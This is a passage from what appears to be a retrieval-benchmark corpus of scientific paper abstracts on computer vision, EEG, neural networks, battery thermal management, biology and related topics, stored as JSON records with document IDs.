"text": "A key problem in salient object detection is how to effectively exploit the multi-level saliency cues in a unified and data-driven manner. In this paper, building upon the recent success of deep neural networks, we propose a fully convolutional neural network based approach empowered with multi-level fusion to salient object detection. By integrating saliency cues at different levels through fully convolutional neural networks and multi-level fusion, our approach could effectively exploit both learned semantic cues and higher-order region statistics for edge-accurate salient object detection. First, we fine-tune a fully convolutional neural network for semantic segmentation to adapt it to salient object detection to learn a suitable yet coarse perpixel saliency prediction map. This map is often smeared across salient object boundaries since the local receptive fields in the convolutional network apply naturally on both sides of such boundaries. Second, to enhance the resolution of the learned saliency prediction and to incorporate higher-order cues that are omitted by the neural network, we propose a multi-level fusion approach where super-pixel level coherency in saliency is exploited. Our extensive experimental results on various benchmark datasets demonstrate that the proposed method outperforms the state-of the-art approaches.",
"title": ""
},
{
"docid": "0323cfb6e74e160c44e0922a49ecc28b",
"text": "Generating diverse questions for given images is an important task for computational education, entertainment and AI assistants. Different from many conventional prediction techniques is the need for algorithms to generate a diverse set of plausible questions, which we refer to as creativity. In this paper we propose a creative algorithm for visual question generation which combines the advantages of variational autoencoders with long short-term memory networks. We demonstrate that our framework is able to generate a large set of varying questions given a single input image.",
"title": ""
},
{
"docid": "d95e509c80d3eb2d67671579d6f585ab",
"text": "In this article we describe EANT2, Evolutionary Acquisition of Neural Topologies, Version 2 , a method that creates neural networks by evolutionary reinforcement learning. The structure of the networks is developed using mutation operators, starting from a minimal structure. Their parameters are optimised using CMA-ES, Covariance Matrix Adaptation Evolution Strategy , a derandomised variant of evolution strategies. EANT2 can create neural networks that are very specialised; they achieve a very good performance while being relatively small. This can be seen in experiments where our method competes with a different one, called NEAT, NeuroEvolution of Augmenting Topologies , to create networks that control a robot in a visual servoing scenario.",
"title": ""
},
{
"docid": "9b595be17a7501c9a30ba7f93d16f23d",
"text": "Various topic models have been developed for sentiment analysis tasks. But the simple topic-sentiment mixture assumption prohibits them from finding fine-grained dependency between topical aspects and sentiments. In this paper, we build a Hidden Topic Sentiment Model (HTSM) to explicitly capture topic coherence and sentiment consistency in an opinionated text document so as to accurately extract latent aspects and corresponding sentiment polarities. In HTSM, 1) topic coherence is achieved by enforcing words in the same sentence to share the same topic assignment and modeling topic transition between successive sentences; 2) sentiment consistency is imposed by constraining topic transitions via tracking sentiment changes; and 3) both topic transition and sentiment transition are guided by a parameterized logistic function based on the linguistic signals directly observable in a document. Extensive experiments on four categories of product reviews from both Amazon and NewEgg validate the effectiveness of the proposed model.",
"title": ""
},
{
"docid": "43e5146e4a7723cf391b013979a1da32",
"text": "The notions of disintegration and Bayesian inversion are fundamental in conditional probability theory. They produce channels, as conditional probabilities, from a joint state, or from an already given channel (in opposite direction). These notions exist in the literature, in concrete situations, but are presented here in abstract graphical formulations. The resulting abstract descriptions are used for proving basic results in conditional probability theory. The existence of disintegration and Bayesian inversion is discussed for discrete probability, and also for measure-theoretic probability — via standard Borel spaces and via likelihoods. Finally, the usefulness of disintegration and Bayesian inversion is illustrated in several examples.",
"title": ""
},
{
"docid": "e29f4224c5d0f921304e54bd1555cb38",
"text": "More and more sensitivity improvement is required for current sensors that are used in new area of applications, such as electric vehicle, smart meter, and electricity usage monitoring system. To correspond with the technical needs, a high precision magnetic current sensor module has been developed. The sensor module features an excellent linearity and a small magnetic hysteresis. In addition, it offers 2.5-4.5 V voltage output for 0-300 A positive input current and 0.5-2.5 V voltage output for 0-300 A negative input current under -40 °C-125 °C, VCC = 5 V condition.",
"title": ""
},
{
"docid": "378f33b14b499c65d75a0f83bda17438",
"text": "We present the design of a soft wearable robotic device composed of elastomeric artificial muscle actuators and soft fabric sleeves, for active assistance of knee motions. A key feature of the device is the two-dimensional design of the elastomer muscles that not only allows the compactness of the device, but also significantly simplifies the manufacturing process. In addition, the fabric sleeves make the device lightweight and easily wearable. The elastomer muscles were characterized and demonstrated an initial contraction force of 38N and maximum contraction of 18mm with 104kPa input pressure, approximately. Four elastomer muscles were employed for assisted knee extension and flexion. The robotic device was tested on a 3D printed leg model with an articulated knee joint. Experiments were conducted to examine the relation between systematic change in air pressure and knee extension-flexion. The results showed maximum extension and flexion angles of 95° and 37°, respectively. However, these angles are highly dependent on underlying leg mechanics and positions. The device was also able to generate maximum extension and flexion forces of 3.5N and 7N, respectively.",
"title": ""
},
{
"docid": "a830e1cc383236d9760bf6640c075eb9",
"text": "Graph data management tools are nowadays evolving at a great pace. Key drivers of progress in the design and study of data intensive systems are solutions for synthetic generation of data and workloads, for use in empirical studies. Current graph generators, however, provide limited or no support for workload generation or are limited to fixed use-cases. Towards addressing these limitations, we demonstrate gMark, the first domainand query languageindependent framework for synthetic graph and query workload generation. Its novel features are: (i) fine-grained control of graph instance and query workload generation via expressive user-defined schemas; (ii) the support of expressive graph query languages, including recursion among other features; and, (iii) selectivity estimation of the generated queries. During the demonstration, we will showcase the highly tunable generation of graphs and queries through various user-defined schemas and targeted selectivities, and the variety of supported practical graph query languages. We will also show a performance comparison of four state-ofthe-art graph database engines, which helps us understand their current strengths and desirable future extensions.",
"title": ""
},
{
"docid": "4d5d43c8f8d9bc5753f39e7978b23a0b",
"text": "The future of high-performance computing is likely to rely on the ability to efficiently exploit huge amounts of parallelism. One way of taking advantage of this parallelism is to formulate problems as \"embarrassingly parallel\" Monte-Carlo simulations, which allow applications to achieve a linear speedup over multiple computational nodes, without requiring a super-linear increase in inter-node communication. However, such applications are reliant on a cheap supply of high quality random numbers, particularly for the three main maximum entropy distributions: uniform, used as a general source of randomness; Gaussian, for discrete-time simulations; and exponential, for discrete-event simulations. In this paper we look at four different types of platform: conventional multi-core CPUs (Intel Core2); GPUs (NVidia GTX 200); FPGAs (Xilinx Virtex-5); and Massively Parallel Processor Arrays (Ambric AM2000). For each platform we determine the most appropriate algorithm for generating each type of number, then calculate the peak generation rate and estimated power efficiency for each device.",
"title": ""
},
{
"docid": "85e593e5a663346978272bf13a1d135a",
"text": "Methods. Two text analysis tools were used to examine the crime narratives of 14 psychopathic and 38 non-psychopathic homicide offenders. Psychopathy was determined using the Psychopathy Checklist-Revised (PCL-R). The Wmatrix linguistic analysis tool (Rayson, 2008) was used to examine parts of speech and semantic content while the Dictionary of Affect and Language (DAL) tool (Whissell & Dewson, 1986) was used to examine the emotional characteristics of the narratives.",
"title": ""
},
{
"docid": "b21356575aa37afdfb4862ac982b7757",
"text": "Distance or similarity measures are essential to solve many pattern recognition problems such as classification, clustering, and retrieval problems. Various distance/similarity measures that are applicable to compare two probability density functions, pdf in short, are reviewed and categorized in both syntactic and semantic relationships. A correlation coefficient and a hierarchical clustering technique are adopted to reveal similarities among numerous distance/similarity measures.",
"title": ""
},
{
"docid": "95d624c86fcd86377e46738689bb18a8",
"text": "EEG desynchronization is a reliable correlate of excited neural structures of activated cortical areas. EEG synchronization within the alpha band may be an electrophysiological correlate of deactivated cortical areas. Such areas are not processing sensory information or motor output and can be considered to be in an idling state. One example of such an idling cortical area is the enhancement of mu rhythms in the primary hand area during visual processing or during foot movement. In both circumstances, the neurons in the hand area are not needed for visual processing or preparation for foot movement. As a result of this, an enhanced hand area mu rhythm can be observed.",
"title": ""
},
{
"docid": "e483d914e00fa46a6be188fabd396165",
"text": "Assessing distance betweeen the true and the sample distribution is a key component of many state of the art generative models, such as Wasserstein Autoencoder (WAE). Inspired by prior work on Sliced-Wasserstein Autoencoders (SWAE) and kernel smoothing we construct a new generative model – Cramer-Wold AutoEncoder (CWAE). CWAE cost function, based on introduced Cramer-Wold distance between samples, has a simple closed-form in the case of normal prior. As a consequence, while simplifying the optimization procedure (no need of sampling necessary to evaluate the distance function in the training loop), CWAE performance matches quantitatively and qualitatively that of WAE-MMD (WAE using maximum mean discrepancy based distance function) and often improves upon SWAE.",
"title": ""
},
{
"docid": "6f0870195649231ceb47edc4e5ef59a5",
"text": "In 2014, Ungar et al. proposed Korz, a new computational model for structuring adaptive (object-oriented) systems [UOK14]. Korz combines implicit parameters and multiple dispatch to structure the behavior of objects in a multidimensional space. Korz is a simple yet expressive model which does not require special programming techniques such as the Visitor or Strategy pattern to accommodate a system for emerging contextual requirements. We show how the ideas of Korz can be integrated in a Prolog system by extending its syntax and semantics with simple meta-programming techniques. We developed a library, called mdp (multidi-mensional predicates) which can be used to experiment with multidimensional Prolog systems. We highlight its benefits with numerous scenarios such as printing debugging information, memoization, object-oriented programming and adaptive GUIs. In particular, we point out that we can structure and extend Prolog programs with additional concerns in a clear and concise manner. We also demonstrate how Prolog's unique meta-programming capabilities allow for quick experimentation with syntactical and semantical enhancement of the new, multidimensional model. While there are many open concerns, such as efficiency and comprehensibility in the case of larger systems, we will see that we can use the leverage of mdp and Prolog to explore new horizons in the design of adaptive systems.",
"title": ""
},
{
"docid": "591b0a6e8d690dd77485b13cb0b14a9f",
"text": "A human face provides a variety of different communicative functions such as identification, the perception of emotional expression, and lip-reading. For these reasons, many applications in robotics require tracking and recognizing a human face. A novel face recognition system should be able to deal with various changes in face images, such as pose, illumination, and expression, among which pose variation is the most difficult one to deal with. Therefore, face registration (alignment) is the key of robust face recognition. If we can register face images into frontal views, the recognition task would be much easier. To align a face image into a canonical frontal view, we need to know the pose information of a human head. Therefore, in this paper, we propose a novel method for modeling a human head as a simple 3D ellipsoid. And also, we present 3D head tracking and pose estimation methods using the proposed ellipsoidal model. After recovering full motion of the head, we can register face images with pose variations into stabilized view images which are suitable for frontal face recognition. By doing so, simple and efficient frontal face recognition can be easily carried out in the stabilized texture map space instead of the original input image space. To evaluate the feasibility of the proposed approach using a simple ellipsoid model, 3D head tracking experiments are carried out on 45 image sequences with ground truth from Boston University, and several face recognition experiments are conducted on our laboratory database and the Yale Face Database B by using subspace-based face recognition methods such as PCA, PCA+LAD, and DCV.",
"title": ""
},
{
"docid": "61998885a181e074eadd41a2f067f697",
"text": "Introduction. Opinion mining has been receiving increasing attention from a broad range of scientific communities since early 2000s. The present study aims to systematically investigate the intellectual structure of opinion mining research. Method. Using topic search, citation expansion, and patent search, we collected 5,596 bibliographic records of opinion mining research. Then, intellectual landscapes, emerging trends, and recent developments were identified. We also captured domain-level citation trends, subject category assignment, keyword co-occurrence, document co-citation network, and landmark articles. Analysis. Our study was guided by scientometric approaches implemented in CiteSpace, a visual analytic system based on networks of co-cited documents. We also employed a dual-map overlay technique to investigate epistemological characteristics of the domain. Results. We found that the investigation of algorithmic and linguistic aspects of opinion mining has been of the community’s greatest interest to understand, quantify, and apply the sentiment orientation of texts. Recent thematic trends reveal that practical applications of opinion mining such as the prediction of market value and investigation of social aspects of product feedback have received increasing attention from the community. Conclusion. Opinion mining is fast-growing and still developing, exploring the refinements of related techniques and applications in a variety of domains. We plan to apply the proposed analytics to more diverse domains and comprehensive publication materials to gain more generalized understanding of the true structure of a science.",
"title": ""
},
{
"docid": "8d7a7bc2b186d819b36a0a8a8ba70e39",
"text": "Recent stereo algorithms have achieved impressive results by modelling the disparity image as a Markov Random Field (MRF). An important component of an MRF-based approach is the inference algorithm used to find the most likely setting of each node in the MRF. Algorithms have been proposed which use Graph Cuts or Belief Propagation for inference. These stereo algorithms differ in both the inference algorithm used and the formulation of the MRF. It is unknown whether to attribute the responsibility for differences in performance to the MRF or the inference algorithm. We address this through controlled experiments by comparing the Belief Propagation algorithm and the Graph Cuts algorithm on the same MRF’s, which have been created for calculating stereo disparities. We find that the labellings produced by the two algorithms are comparable. The solutions produced by Graph Cuts have a lower energy than those produced with Belief Propagation, but this does not necessarily lead to increased performance relative to the ground-truth.",
"title": ""
},
{
"docid": "ab0c80a10d26607134828c6b350089aa",
"text": "Parkinson's disease (PD) is a neurodegenerative disorder with symptoms that progressively worsen with age. Pathologically, PD is characterized by the aggregation of α-synuclein in cells of the substantia nigra in the brain and loss of dopaminergic neurons. This pathology is associated with impaired movement and reduced cognitive function. The etiology of PD can be attributed to a combination of environmental and genetic factors. A popular animal model, the nematode roundworm Caenorhabditis elegans, has been frequently used to study the role of genetic and environmental factors in the molecular pathology and behavioral phenotypes associated with PD. The current review summarizes cellular markers and behavioral phenotypes in transgenic and toxin-induced PD models of C. elegans.",
"title": ""
}
] | scidocsrr |
9c2e817698cc2f3bde589ce08f60f265 | Nested Named Entity Recognition Revisited | [
{
"docid": "9b5207fc5beec8d2094d214cf8bfbded",
"text": "We present a novel model for the task of joint mention extraction and classification. Unlike existing approaches, our model is able to effectively capture overlapping mentions with unbounded lengths. The model is highly scalable, with a time complexity that is linear in the number of words in the input sentence and linear in the number of possible mention classes. Our model can be extended to additionally capture mention heads explicitly in a joint manner under the same time complexity. We demonstrate the effectiveness of our model through extensive experiments on standard datasets.",
"title": ""
}
] | [
{
"docid": "39861e2759b709883f3d37a65d13834b",
"text": "BACKGROUND\nDeveloping countries account for 99 percent of maternal deaths annually. While increasing service availability and maintaining acceptable quality standards, it is important to assess maternal satisfaction with care in order to make it more responsive and culturally acceptable, ultimately leading to enhanced utilization and improved outcomes. At a time when global efforts to reduce maternal mortality have been stepped up, maternal satisfaction and its determinants also need to be addressed by developing country governments. This review seeks to identify determinants of women's satisfaction with maternity care in developing countries.\n\n\nMETHODS\nThe review followed the methodology of systematic reviews. Public health and social science databases were searched. English articles covering antenatal, intrapartum or postpartum care, for either home or institutional deliveries, reporting maternal satisfaction from developing countries (World Bank list) were included, with no year limit. Out of 154 shortlisted abstracts, 54 were included and 100 excluded. Studies were extracted onto structured formats and analyzed using the narrative synthesis approach.\n\n\nRESULTS\nDeterminants of maternal satisfaction covered all dimensions of care across structure, process and outcome. Structural elements included good physical environment, cleanliness, and availability of adequate human resources, medicines and supplies. Process determinants included interpersonal behavior, privacy, promptness, cognitive care, perceived provider competency and emotional support. Outcome related determinants were health status of the mother and newborn. Access, cost, socio-economic status and reproductive history also influenced perceived maternal satisfaction. Process of care dominated the determinants of maternal satisfaction in developing countries. Interpersonal behavior was the most widely reported determinant, with the largest body of evidence generated around provider behavior in terms of courtesy and non-abuse. Other aspects of interpersonal behavior included therapeutic communication, staff confidence and competence and encouragement to laboring women.\n\n\nCONCLUSIONS\nQuality improvement efforts in developing countries could focus on strengthening the process of care. Special attention is needed to improve interpersonal behavior, as evidence from the review points to the importance women attach to being treated respectfully, irrespective of socio-cultural or economic context. Further research on maternal satisfaction is required on home deliveries and relative strength of various determinants in influencing maternal satisfaction.",
"title": ""
},
{
"docid": "a1c149b7130b4a30c33aacb4add34deb",
"text": "Supervised learning techniques construct predictive models by learning from a large number of training examples, where each training example has a label indicating its ground-truth output. Though current techniques have achieved great success, it is noteworthy that in many tasks it is difficult to get strong supervision information like fully ground-truth labels due to the high cost of data labeling process. Thus, it is desired for machine learning techniques to work with weak supervision. This article reviews some research progress of weakly supervised learning, focusing on three typical types of weak supervision: incomplete supervision where only a subset of training data are given with labels; inexact supervision where the training data are given with only coarse-grained labels; inaccurate supervision where the given labels are not always ground-truth.",
"title": ""
},
{
"docid": "04ba17b4fc6b506ee236ba501d6cb0cf",
"text": "We propose a family of learning algorithms based on a new form f regularization that allows us to exploit the geometry of the marginal distribution. We foc us on a semi-supervised framework that incorporates labeled and unlabeled data in a general-p u pose learner. Some transductive graph learning algorithms and standard methods including Suppor t Vector Machines and Regularized Least Squares can be obtained as special cases. We utilize pr op rties of Reproducing Kernel Hilbert spaces to prove new Representer theorems that provide theor e ical basis for the algorithms. As a result (in contrast to purely graph-based approaches) we ob tain a natural out-of-sample extension to novel examples and so are able to handle both transductive and truly semi-supervised settings. We present experimental evidence suggesting that our semiupervised algorithms are able to use unlabeled data effectively. Finally we have a brief discuss ion of unsupervised and fully supervised learning within our general framework.",
"title": ""
},
{
"docid": "76d27ae5220bdd692448797e8115d658",
"text": "Abstinence following daily marijuana use can produce a withdrawal syndrome characterized by negative mood (eg irritability, anxiety, misery), muscle pain, chills, and decreased food intake. Two placebo-controlled, within-subject studies investigated the effects of a cannabinoid agonist, delta-9-tetrahydrocannabinol (THC: Study 1), and a mood stabilizer, divalproex (Study 2), on symptoms of marijuana withdrawal. Participants (n=7/study), who were not seeking treatment for their marijuana use, reported smoking 6–10 marijuana cigarettes/day, 6–7 days/week. Study 1 was a 15-day in-patient, 5-day outpatient, 15-day in-patient design. During the in-patient phases, participants took oral THC capsules (0, 10 mg) five times/day, 1 h prior to smoking marijuana (0.00, 3.04% THC). Active and placebo marijuana were smoked on in-patient days 1–8, while only placebo marijuana was smoked on days 9–14, that is, marijuana abstinence. Placebo THC was administered each day, except during one of the abstinence phases (days 9–14), when active THC was given. Mood, psychomotor task performance, food intake, and sleep were measured. Oral THC administered during marijuana abstinence decreased ratings of ‘anxious’, ‘miserable’, ‘trouble sleeping’, ‘chills’, and marijuana craving, and reversed large decreases in food intake as compared to placebo, while producing no intoxication. Study 2 was a 58-day, outpatient/in-patient design. Participants were maintained on each divalproex dose (0, 1500 mg/day) for 29 days each. Each maintenance condition began with a 14-day outpatient phase for medication induction or clearance and continued with a 15-day in-patient phase. Divalproex decreased marijuana craving during abstinence, yet increased ratings of ‘anxious’, ‘irritable’, ‘bad effect’, and ‘tired.’ Divalproex worsened performance on psychomotor tasks, and increased food intake regardless of marijuana condition. Thus, oral THC decreased marijuana craving and withdrawal symptoms at a dose that was subjectively indistinguishable from placebo. Divalproex worsened mood and cognitive performance during marijuana abstinence. These data suggest that oral THC, but not divalproex, may be useful in the treatment of marijuana dependence.",
"title": ""
},
{
"docid": "dc76a4d28841e703b961a1126bd28a39",
"text": "In this work, we study the problem of anomaly detection of the trajectories of objects in a visual scene. For this purpose, we propose a novel representation for trajectories utilizing covariance features. Representing trajectories via co-variance features enables us to calculate the distance between the trajectories of different lengths. After setting this proposed representation and calculation of distances, anomaly detection is achieved by sparse representations on nearest neighbours. Conducted experiments on both synthetic and real datasets show that the proposed method yields results which are outperforming or comparable with state of the art.",
"title": ""
},
{
"docid": "3380a9a220e553d9f7358739e3f28264",
"text": "We present a multi-instance object segmentation algorithm to tackle occlusions. As an object is split into two parts by an occluder, it is nearly impossible to group the two separate regions into an instance by purely bottomup schemes. To address this problem, we propose to incorporate top-down category specific reasoning and shape prediction through exemplars into an intuitive energy minimization framework. We perform extensive evaluations of our method on the challenging PASCAL VOC 2012 segmentation set. The proposed algorithm achieves favorable results on the joint detection and segmentation task against the state-of-the-art method both quantitatively and qualitatively.",
"title": ""
},
{
"docid": "e7a22474a051cfd64e64e393d87ff1c9",
"text": "Sequence alignment is an important problem in computational biology. We compare two different approaches to the problem of optimally aligning two or more character strings: bounded dynamic programming (BDP), and divide-and-conquer frontier search (DCFS). The approaches are compared in terms of time and space requirements in 2 through 5 dimensions with sequences of varying similarity and length. While BDP performs better in two and three dimensions, it consumes more time and memory than DCFS for higher-dimensional problems.",
"title": ""
},
{
"docid": "4d5820e9e137c96d4d63e25772c577c6",
"text": "facial topography clinical anatomy of the face upsky facial topography: clinical anatomy of the face by joel e facial topography clinical anatomy of the face [c796.ebook] free ebook facial topography: clinical the anatomy of the aging face: volume loss and changes in facial topographyclinical anatomy of the face ebook facial anatomy mccc dmca / copyrighted works removal title anatomy for plastic surgery thieme medical publishers the face sample quintessence publishing! facial anatomy 3aface academy facial topography clinical anatomy of the face ebook download the face der medizinverlag facial topography clinical anatomy of the face liive facial topography clinical anatomy of the face user clinical anatomy of the head univerzita karlova pdf download the face: pictorial atlas of clinical anatomy clinical anatomy anatomic landmarks for localisation of j m perry co v commissioner internal bouga international journal of anatomy and research, case report anatomy and physiology of the aging neck the clinics topographical anatomy of the head eng nikolaizarovo crc title list: change of ownership a guide to childrens books about asian americans fractography: observing, measuring and interpreting nystce students with disabilities study guide tibca army ranger survival guide compax sharp grill 2 convection manual iwsun nursing diagnosis handbook 9th edition apa citation the surgical management of facial nerve injury lipteh the outermost house alongz cosmetic voted best plastic surgeon in dallas texas c tait a dachau 1933 1945 teleip select your ebook amazon s3 quotation of books all india institute of medical latest ten anatomy acquisitions british dental association lindens complete auto repair reviews mires department of topographic anatomy and operative surgery",
"title": ""
},
{
"docid": "4a87a9409a0b79434a22edde5c308dd8",
"text": "A model explaining several causes and consequences of negative teacher–pupil relationships was developed. Data from 109 teachers and 946 high school pupils was analyzed using path analysis. The results suggest that teachers who prefer a custodial approach of controlling pupils, who have lower morale due to school climate conditions and who are less likely to burn out, tend to adopt conflict-inducing attitudes towards pupils. The results also demonstrate a high incidence of educational, psychological and somatic complaints in students whose characterized teachers are perceived as more hostile in their attitude towards pupils. Implications of these findings are discussed. r 2002 Elsevier Science Ltd. All rights reserved.",
"title": ""
},
{
"docid": "019d465534b9229c2a97f1727c400832",
"text": "OBJECTIVE\nResearch on learning from feedback has produced ambiguous guidelines for feedback design--some have advocated minimal feedback, whereas others have recommended more extensive feedback that highly supported performance. The objective of the current study was to investigate how individual differences in cognitive resources may predict feedback requirements and resolve previous conflicted findings.\n\n\nMETHOD\nCognitive resources were controlled for by comparing samples from populations with known differences, older and younger adults.To control for task demands, a simple rule-based learning task was created in which participants learned to identify fake Windows pop-ups. Pop-ups were divided into two categories--those that required fluid ability to identify and those that could be identified using crystallized intelligence.\n\n\nRESULTS\nIn general, results showed participants given higher feedback learned more. However, when analyzed by type of task demand, younger adults performed comparably with both levels of feedback for both cues whereas older adults benefited from increased feedbackfor fluid ability cues but from decreased feedback for crystallized ability cues.\n\n\nCONCLUSION\nOne explanation for the current findings is feedback requirements are connected to the cognitive abilities of the learner-those with higher abilities for the type of demands imposed by the task are likely to benefit from reduced feedback.\n\n\nAPPLICATION\nWe suggest the following considerations for feedback design: Incorporate learner characteristics and task demands when designing learning support via feedback.",
"title": ""
},
{
"docid": "2b310a05b6a0c0fae45a2e15f8d52101",
"text": "Cyber threats and the field of computer cyber defense are gaining more and more an increased importance in our lives. Starting from our regular personal computers and ending with thin clients such as netbooks or smartphones we find ourselves bombarded with constant malware attacks. In this paper we will present a new and novel way in which we can detect these kind of attacks by using elements of modern game theory. We will present the effects and benefits of game theory and we will talk about a defense exercise model that can be used to train cyber response specialists.",
"title": ""
},
{
"docid": "cf3c9769496d51078904495d18198626",
"text": "Five different threshold segmentation based approaches have been reviewed and compared over here to extract the tumor from set of brain images. This research focuses on the analysis of image segmentation methods, a comparison of five semi-automated methods have been undertaken for evaluating their relative performance in the segmentation of tumor. Consequently, results are compared on the basis of quantitative and qualitative analysis of respective methods. The purpose of this study was to analytically identify the methods, most suitable for application for a particular genre of problems. The results show that of the region growing segmentation performed better than rest in most cases.",
"title": ""
},
{
"docid": "ba3f0e792b896b38f8844807a8d8e80e",
"text": "In this paper, we present a novel self-learning single image super-resolution (SR) method, which restores a high-resolution (HR) image from self-examples extracted from the low-resolution (LR) input image itself without relying on extra external training images. In the proposed method, we directly use sampled image patches as the anchor points, and then learn multiple linear mapping functions based on anchored neighborhood regression to transform LR space into HR space. Moreover, we utilize the flipped and rotated versions of the self-examples to expand the internal patch space. Experimental comparison on standard benchmarks with state-of-the-art methods validates the effectiveness of the proposed approach.",
"title": ""
},
{
"docid": "70374e96446dcc65a0f5fa64e439a472",
"text": "Electric Vehicles (EVs) are projected as the most sustainable solutions for future transportation. EVs have many advantages over conventional hydrocarbon internal combustion engines including energy efficiency, environmental friendliness, noiselessness and less dependence on fossil fuels. However, there are also many challenges which are mainly related to the battery pack, such as battery cost, driving range, reliability, safety, battery capacity, cycle life, and recharge time. The performance of EVs is greatly dependent on the battery pack. Temperatures of the cells in a battery pack need to be maintained within its optimum operating temperature range in order to achieve maximum performance, safety and reliability under various operating conditions. Poor thermal management will affect the charging and discharging power, cycle life, cell balancing, capacity and fast charging capability of the battery pack. Hence, a thermal management system is needed in order to enhance the performance and to extend the life cycle of the battery pack. In this study, the effects of temperature on the Li-ion battery are investigated. Heat generated by LiFePO4 pouch cell was characterized using an EV accelerating rate calorimeter. Computational fluid dynamic analyses were carried out to investigate the performance of a liquid cooling system for a battery pack. The numerical simulations showed promising results and the design of the battery pack thermal management system was sufficient to ensure that the cells operated within their temperature limits.",
"title": ""
},
{
"docid": "bbf987eef74d76cf2916ae3080a2b174",
"text": "The facial system plays an important role in human-robot interaction. EveR-4 H33 is a head system for an android face controlled by thirty-three motors. It consists of three layers: a mechanical layer, an inner cover layer and an outer cover layer. Motors are attached under the skin and some motors are correlated with each other. Some expressions cannot be shown by moving just one motor. In addition, moving just one motor can cause damage to other motors or the skin. To solve these problems, a facial muscle control method that controls motors in a correlated manner is required. We designed a facial muscle control method and applied it to EveR-4 H33. We develop the actress robot EveR-4A by applying the EveR-4 H33 to the 24 degrees of freedom upper body and mannequin legs. EveR-4A shows various facial expressions with lip synchronization using our facial muscle control method.",
"title": ""
},
{
"docid": "69d826aa8309678cf04e2870c23a99dd",
"text": "Contemporary analyses of cell metabolism have called out three metabolites: ATP, NADH, and acetyl-CoA, as sentinel molecules whose accumulation represent much of the purpose of the catabolic arms of metabolism and then drive many anabolic pathways. Such analyses largely leave out how and why ATP, NADH, and acetyl-CoA (Figure 1 ) at the molecular level play such central roles. Yet, without those insights into why cells accumulate them and how the enabling properties of these key metabolites power much of cell metabolism, the underlying molecular logic remains mysterious. Four other metabolites, S-adenosylmethionine, carbamoyl phosphate, UDP-glucose, and Δ2-isopentenyl-PP play similar roles in using group transfer chemistry to drive otherwise unfavorable biosynthetic equilibria. This review provides the underlying chemical logic to remind how these seven key molecules function as mobile packets of cellular currencies for phosphoryl transfers (ATP), acyl transfers (acetyl-CoA, carbamoyl-P), methyl transfers (SAM), prenyl transfers (IPP), glucosyl transfers (UDP-glucose), and electron and ADP-ribosyl transfers (NAD(P)H/NAD(P)+) to drive metabolic transformations in and across most primary pathways. The eighth key metabolite is molecular oxygen (O2), thermodynamically activated for reduction by one electron path, leaving it kinetically stable to the vast majority of organic cellular metabolites.",
"title": ""
},
{
"docid": "51df36570be2707556a8958e16682612",
"text": "Through co-design of Augmented Reality (AR) based teaching material, this research aims to enhance collaborative learning experience in primary school education. It will introduce an interactive AR Book based on primary school textbook using tablets as the real time interface. The development of this AR Book employs co-design methods to involve children, teachers, educators and HCI experts from the early stages of the design process. Research insights from the co-design phase will be implemented in the AR Book design. The final outcome of the AR Book will be evaluated in the classroom to explore its effect on the collaborative experience of primary school students. The research aims to answer the question - Can Augmented Books be designed for primary school students in order to support collaboration? This main research question is divided into two sub-questions as follows - How can co-design methods be applied in designing Augmented Book with and for primary school children? And what is the effect of the proposed Augmented Book on primary school students' collaboration? This research will not only present a practical application of co-designing AR Book for and with primary school children, it will also clarify the benefit of AR for education in terms of collaborative experience.",
"title": ""
},
{
"docid": "3b03af1736709e536a4a58363102bc60",
"text": "Music transcription, as an essential component in music signal processing, contributes to wide applications in musicology, accelerates the development of commercial music industry, facilitates the music education as well as benefits extensive music lovers. However, the work relies on a lot of manual work due to heavy requirements on knowledge and experience. This project mainly examines two deep learning methods, DNN and LSTM, to automatize music transcription. We transform the audio files into spectrograms using constant Q transform and extract features from the spectrograms. Deep learning methods have the advantage of learning complex features in music transcription. The promising results verify that deep learning methods are capable of learning specific musical properties, including notes and rhythms. Keywords—automatic music transcription; deep learning; deep neural network (DNN); long shortterm memory networks (LSTM)",
"title": ""
},
{
"docid": "f560dbe8f3ff47731061d67b596ec7b0",
"text": "This paper considers the problem of fixed priority scheduling of periodic tasks with arbitrary deadlines. A general criterion for the schedulability of such a task set is given. Worst case bounds are given which generalize the Liu and Layland bound. The results are shown to provide a basis for developing predictable distributed real-time systems.",
"title": ""
}
] | scidocsrr |
c07d4fc01a91827bbddab461c5636c4e | Decoding hand movement velocity from electroencephalogram signals during a drawing task | [
{
"docid": "72e1db0153193956735c7906704c0907",
"text": "Eye movements, eye blinks, cardiac signals, muscle noise, and line noise present serious problems for electroencephalographic (EEG) interpretation and analysis when rejecting contaminated EEG segments results in an unacceptable data loss. Many methods have been proposed to remove artifacts from EEG recordings, especially those arising from eye movements and blinks. Often regression in the time or frequency domain is performed on parallel EEG and electrooculographic (EOG) recordings to derive parameters characterizing the appearance and spread of EOG artifacts in the EEG channels. Because EEG and ocular activity mix bidirectionally, regressing out eye artifacts inevitably involves subtracting relevant EEG signals from each record as well. Regression methods become even more problematic when a good regressing channel is not available for each artifact source, as in the case of muscle artifacts. Use of principal component analysis (PCA) has been proposed to remove eye artifacts from multichannel EEG. However, PCA cannot completely separate eye artifacts from brain signals, especially when they have comparable amplitudes. Here, we propose a new and generally applicable method for removing a wide variety of artifacts from EEG records based on blind source separation by independent component analysis (ICA). Our results on EEG data collected from normal and autistic subjects show that ICA can effectively detect, separate, and remove contamination from a wide variety of artifactual sources in EEG records with results comparing favorably with those obtained using regression and PCA methods. ICA can also be used to analyze blink-related brain activity.",
"title": ""
},
{
"docid": "c3bf2b73b2693c509c228293cd64ce3d",
"text": "In this work we present the first comprehensive survey of Brain Interface (BI) technology designs published prior to January 2006. Detailed results from this survey, which was based on the Brain Interface Design Framework proposed by Mason and Birch, are presented and discussed to address the following research questions: (1) which BI technologies are directly comparable, (2) what technology designs exist, (3) which application areas (users, activities and environments) have been targeted in these designs, (4) which design approaches have received little or no research and are possible opportunities for new technology, and (5) how well are designs reported. The results of this work demonstrate that meta-analysis of high-level BI design attributes is possible and informative. The survey also produced a valuable, historical cross-reference where BI technology designers can identify what types of technology have been proposed and by whom.",
"title": ""
}
] | [
{
"docid": "a3fafe73615c434375cd3f35323c939e",
"text": "In this paper, Magnetic Resonance Images,T2 weighte d modality , have been pre-processed by bilateral filter to reduce th e noise and maintaining edges among the different tissues. Four different t echniques with morphological operations have been applied to extra c the tumor region. These were: Gray level stretching and Sobel edge de tection, K-Means Clustering technique based on location and intensit y, Fuzzy C-Means Clustering, and An Adapted K-Means clustering techn ique and Fuzzy CMeans technique. The area of the extracted tumor re gions has been calculated. The present work showed that the four i mplemented techniques can successfully detect and extract the brain tumor and thereby help doctors in identifying tumor's size and region.",
"title": ""
},
{
